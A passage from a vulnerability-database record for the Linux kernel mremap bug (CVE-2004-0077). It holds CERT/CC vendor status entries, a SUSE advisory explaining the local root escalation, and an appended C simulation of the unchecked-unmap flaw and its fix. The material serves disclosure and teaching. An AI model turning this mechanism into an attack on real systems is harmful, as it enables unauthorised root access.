vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Fedora Legacy Project __ Affected\n\nUpdated: March 25, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [FLSA:1284](<http://www.fedoralegacy.org/updates/RH7.2/2004-03-02-FLSA_2004_1284__Updated_kernel_resolves_security_vulnerabilities.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Fedora Project __ Affected\n\nUpdated: March 25, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [FEDORA-2004-080](<http://www.redhat.com/archives/fedora-announce-list/2004-February/msg00025.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Gentoo Linux __ Affected\n\nUpdated: March 11, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [GLSA 200403-02](<http://forums.gentoo.org/viewtopic.php?t=145828>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 
Feedback>).\n\n### Linux Kernel Archives __ Affected\n\nUpdated: March 10, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThis issue is resolved in Linux kernels [2.2.26](<http://www.kernel.org/pub/linux/kernel/v2.2/ChangeLog-2.2.26>), [2.4.25](<http://www.kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.25>), and [2.6.3](<http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.3>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Linux Netwosix __ Affected\n\nUpdated: March 25, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [LNSA-#2004-0003](<http://www.netwosix.org/adv03.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### MandrakeSoft __ Affected\n\nNotified: March 10, 2004 Updated: March 25, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [MDKSA-2004:015](<http://www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2004:015>) and [MDKSA-2004:015-1](<http://www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2004:015-1>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### 
Openwall GNU/*/Linux __ Affected\n\nNotified: March 10, 2004 Updated: March 25, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nNo supported release of Openwall GNU/*/Linux (Owl) was affected by this vulnerability as of the time it was made public. We had the bug proactively fixed in Owl 1.1 release (Linux kernel 2.4.23-ow2), not realizing its full security impact at the time.\n\nAlthough those are no longer a part of Owl (not in Owl 1.1), we continue to maintain security hardening patches for Linux 2.2.x kernels and make them available for the public. Linux 2.2.x was affected by a variation of this vulnerability and thus, as a service to the community, we had included a workaround in Linux 2.2.25-ow2 patch. Linux 2.2.26 now includes the same change.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Red Hat Inc. __ Affected\n\nNotified: March 10, 2004 Updated: March 11, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nUpdates to correct this issue were made available for Red Hat Linux and Red Hat Enterprise Linux. Users of the Red Hat Network can update their systems using the 'up2date' tool. 
\n \nRed Hat Linux 9: \n\n\n \n<http://rhn.redhat.com/errata/RHSA-2004-065.html>Red Hat Enterprise Linux 3: \n\n\n<http://rhn.redhat.com/errata/RHSA-2004-066.html>Red Hat Enterprise Linux 2.1: \n\n\n<http://rhn.redhat.com/errata/RHSA-2004-069.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### SGI __ Affected\n\nNotified: March 10, 2004 Updated: March 25, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [20040204-01-U](<ftp://patches.sgi.com/support/free/security/advisories/20040204-01-U.asc>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Slackware __ Affected\n\nUpdated: March 25, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [SSA:2004-049-01](<http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.541911>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### SmoothWall __ Affected\n\nUpdated: March 11, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not 
provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [SWL-2004:002](<http://www.smoothwall.net/support/advisories/SWL-2004.002.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### SuSE Inc. __ Affected\n\nNotified: March 10, 2004 Updated: March 11, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [SuSE-SA:2004:005](<http://www.suse.de/de/security/2004_05_linux_kernel.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Sun Microsystems Inc. __ Affected\n\nNotified: March 10, 2004 Updated: March 25, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe following Sun products are vulnerable.\n\nJava Desktop System Version 2003. \n \nA patch is available to customers via the on-line update mechanism in JDS. Please see <http://wwws.sun.com/software/javadesktopsystem/update/index.html> for further details. 
\n \nSun Cobalt legacy products: \n \nRaQ4 \nRaQXTR \nQube3 \nRaQ550 \n \nSun will be publishing Sun Alerts for this issue which will be available from the following location: \n \n[http://sunsolve.Sun.COM/pub-cgi/search.pl?mode=results&so=date&coll=fsalert&zone_32=category:security](<http://sunsolve.Sun.COM/pub-cgi/search.pl?mode=results&so=date&coll=fsalert&zone_32=category:security>) \n \nThe Sun Alerts will be updated with the patch information as soon as patches are available.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Trustix __ Affected\n\nUpdated: March 11, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see TSLSA-2004-0007 (Trustix 2.0, kernel 2.4.24) and TSLSA-2004-0008 (Trustix 1.5, kernel 2.2.25).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### TurboLinux __ Affected\n\nNotified: March 10, 2004 Updated: March 11, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThis Vulnerability is fixed by TLSA-2004-7. 
\n\n\nPlease refer to \n<http://www.turbolinux.com/security/2004/TLSA-2004-7.txt>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Wirex __ Affected\n\nNotified: March 10, 2004 Updated: March 11, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [IMNX-2004-7+-001-01](<http://mail.immunix.com/pipermail/immunix-announce/2004-February/0102.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Apple Computer Inc. __ Not Affected\n\nNotified: March 10, 2004 Updated: March 11, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nApple: Not Vulnerable\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Fujitsu __ Not Affected\n\nNotified: March 10, 2004 Updated: March 25, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nFujitsu's UXP/V o.s. 
is not affected by the problem in VU#981222 because it does not support the mremap.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### NetBSD __ Not Affected\n\nNotified: March 10, 2004 Updated: March 25, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nNetBSD is not affected.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Cray Inc. Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### EMC Corporation Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### 
FreeBSD Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Guardian Digital Inc. Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Hewlett-Packard Company Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Hitachi Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us 
[email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### IBM __ Unknown\n\nNotified: March 10, 2004 Updated: March 25, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nIBM eServer Platform Response\n\nFor information related to this and other published CERT Advisories that may relate to the IBM eServer Platforms (xSeries, iSeries, pSeries, and zSeries) please go to [https://app-06.www.ibm.com/servers/resourcelink/lib03020.nsf/pages/security=alerts?OpenDocument&pathID=](<https://app-06.www.ibm.com/servers/resourcelink/lib03020.nsf/pages/security=alerts?OpenDocument&pathID=>) \n \nIn order to access this information you will require a Resource Link ID. To subscribe to Resource Link go to <http://app-06.www.ibm.com/servers/resourcelink> and follow the steps for registration. \n \nAll questions should be referred to [servsec@us.ibm.com](<mailto:servsec@us.ibm.com>).\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Ingrian Networks Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Juniper Networks Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with 
any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### MontaVista Software Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### NEC Corporation Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Nokia Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Novell Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### 
Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### OpenBSD Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### SCO Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Sequent Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Sony Corporation Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not 
received a statement from the vendor.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Unisys Unknown\n\nUpdated: March 11, 2004\n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Wind River Systems Inc. Unknown\n\nUpdated: March 11, 2004\n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### CVSS Metrics\n\nGroup | Score | Vector\n---|---|---\nBase | |\nTemporal | |\nEnvironmental | |\n\n### References\n\n * <http://www.kernel.org/>\n * <http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt>\n * <http://www.securityfocus.com/archive/1/354284>\n * <http://www.securityfocus.com/archive/1/355781>\n * <http://www.securityfocus.com/bid/9686>\n * <http://xforce.iss.net/xforce/xfdb/15244>\n * <http://secunia.com/advisories/10897/>\n\n### Acknowledgements\n\nThis vulnerability was researched and reported by Paul Starzetz of iSEC.\n\nThis document was written by Art Manion.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2004-0077](<http://web.nvd.nist.gov/vuln/detail/CVE-2004-0077>)\n---|---\n**Severity Metric:** | 26.52\n**Date Public:** | 2004-02-18\n**Date First Published:** | 2004-03-10\n**Date Last Updated:** | 2004-03-25 17:10 UTC\n**Document Revision:** | 26\n", "modified": "2004-03-25T17:10:00", "published": "2004-03-10T00:00:00", "id": "VU:981222", "href": "https://www.kb.cert.org/vuls/id/981222", "type": "cert", "title": "Linux kernel mremap(2) system call does not properly check return value from do_munmap() function", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:42:50", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0010", "CVE-2003-0991", "CVE-2004-0003", "CVE-2004-0075", "CVE-2004-0077"], "description": "Another bug in the kernel's do_mremap() function, unrelated to the bug fixed in SuSE-SA:2004:001, was found by Paul Starzetz. The do_mremap() function of the Linux kernel is used to manage Virtual Memory Areas (VMAs), which includes moving, removing and resizing memory areas. To remove old memory areas, do_mremap() calls do_munmap() without checking its return value. By forcing do_munmap() to return an error, the memory management of a process can be tricked into moving page table entries from one VMA to another. The destination VMA may carry different protection flags, which enables a local attacker to gain write access to previously read-only pages. The result is local root access to the system.", "edition": 1, "modified": "2004-02-18T22:19:53", "published": "2004-02-18T22:19:53", "id": "SUSE-SA:2004:005", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-02/msg00002.html", "title": "local privilege escalation in Linux Kernel", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
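The failure path the SUSE description walks through (an unmap whose error is ignored, followed by a page-table move into a VMA that was never emptied), shown as an added user-space model. This is example code written for this page, not kernel source and not code from the Debian, CERT or SUSE advisories. All names are hypothetical: `model_munmap()` stands in for `do_munmap()`, `move_page_tables()` for the kernel's PTE move, and the unmap failure is injected with a flag rather than by whatever condition a real exploit arranges. `mremap_vulnerable()` has the unpatched shape, `mremap_fixed()` the patched one.

```c
/* Added example: a user-space model of CVE-2004-0077, not kernel code.
 * Names are hypothetical: model_munmap() stands in for do_munmap(),
 * move_page_tables() for the kernel's PTE move, and the unmap failure is
 * injected by a flag rather than by the condition a real exploit arranges. */
#include <string.h>

#define NPAGES 16
#define NVMAS  4
#define PROT_R 1
#define PROT_W 2

struct vma { int start, end, prot, in_use; }; /* what the kernel believes */
struct pte { int frame, prot; };              /* what the hardware enforces */

struct mm {
    struct vma vmas[NVMAS];
    struct pte ptes[NPAGES];
    int munmap_fails;                         /* fault-injection switch */
};

static void mm_init(struct mm *mm)
{
    memset(mm, 0, sizeof *mm);
    /* pages 0-3: the attacker's private, writable anonymous mapping */
    mm->vmas[0] = (struct vma){0, 4, PROT_R | PROT_W, 1};
    for (int p = 0; p < 4; p++) mm->ptes[p] = (struct pte){100 + p, PROT_R | PROT_W};
    /* pages 8-11: a read-only mapping, e.g. a shared library's text */
    mm->vmas[1] = (struct vma){8, 12, PROT_R, 1};
    for (int p = 8; p < 12; p++) mm->ptes[p] = (struct pte){200 + p, PROT_R};
}

/* Unmap [start, end). Returns 0, or -1 when failure is injected (the real
 * do_munmap() returns a negative errno). On failure nothing is changed. */
static int model_munmap(struct mm *mm, int start, int end)
{
    if (mm->munmap_fails) return -1;
    for (int i = 0; i < NVMAS; i++)
        if (mm->vmas[i].in_use && mm->vmas[i].start == start && mm->vmas[i].end == end)
            mm->vmas[i].in_use = 0;
    for (int p = start; p < end; p++) mm->ptes[p] = (struct pte){0, 0};
    return 0;
}

/* Move len PTEs from old to new and retarget the VMA that owned them.
 * Like the kernel's version, this trusts that the destination is empty. */
static void move_page_tables(struct mm *mm, int old, int new, int len)
{
    for (int i = 0; i < len; i++) {
        mm->ptes[new + i] = mm->ptes[old + i];
        mm->ptes[old + i] = (struct pte){0, 0};
    }
    for (int i = 0; i < NVMAS; i++)
        if (mm->vmas[i].in_use && mm->vmas[i].start == old) {
            mm->vmas[i].start = new;
            mm->vmas[i].end   = new + len;
        }
}

/* Unpatched shape: the unmap result is discarded, so on failure writable
 * PTEs are moved under a VMA the kernel still records as read-only. */
static int mremap_vulnerable(struct mm *mm, int old, int len, int new)
{
    model_munmap(mm, new, new + len);         /* BUG: return value ignored */
    move_page_tables(mm, old, new, len);
    return 0;
}

/* Patched shape: fail closed, move nothing unless the destination was freed. */
static int mremap_fixed(struct mm *mm, int old, int len, int new)
{
    if (model_munmap(mm, new, new + len) != 0) return -1;
    move_page_tables(mm, old, new, len);
    return 0;
}

/* Pages where bookkeeping and enforcement disagree: a PTE grants write
 * under a VMA marked read-only, or two live VMAs overlap the page. */
static int inconsistent_pages(const struct mm *mm)
{
    int n = 0;
    for (int p = 0; p < NPAGES; p++) {
        int covering = 0, ro_vma = 0;
        for (int i = 0; i < NVMAS; i++)
            if (mm->vmas[i].in_use && p >= mm->vmas[i].start && p < mm->vmas[i].end) {
                covering++;
                if (!(mm->vmas[i].prot & PROT_W)) ro_vma = 1;
            }
        if (covering > 1 || (ro_vma && (mm->ptes[p].prot & PROT_W))) n++;
    }
    return n;
}

/* mremap() pages 0-3 onto 8-11 and report how many pages end up inconsistent. */
int run_model(int inject_failure, int use_fixed)
{
    struct mm mm;
    mm_init(&mm);
    mm.munmap_fails = inject_failure;
    if (use_fixed) mremap_fixed(&mm, 0, 4, 8);
    else           mremap_vulnerable(&mm, 0, 4, 8);
    return inconsistent_pages(&mm);
}
```

With a successful unmap both code paths leave the address space consistent; with the injected failure only the unchecked path produces pages whose PTE is writable while the VMA covering them is still recorded as read-only, which is the state the advisory describes an attacker abusing. The fix is the one-line check on the unmap result, which is exactly what the patched kernels added.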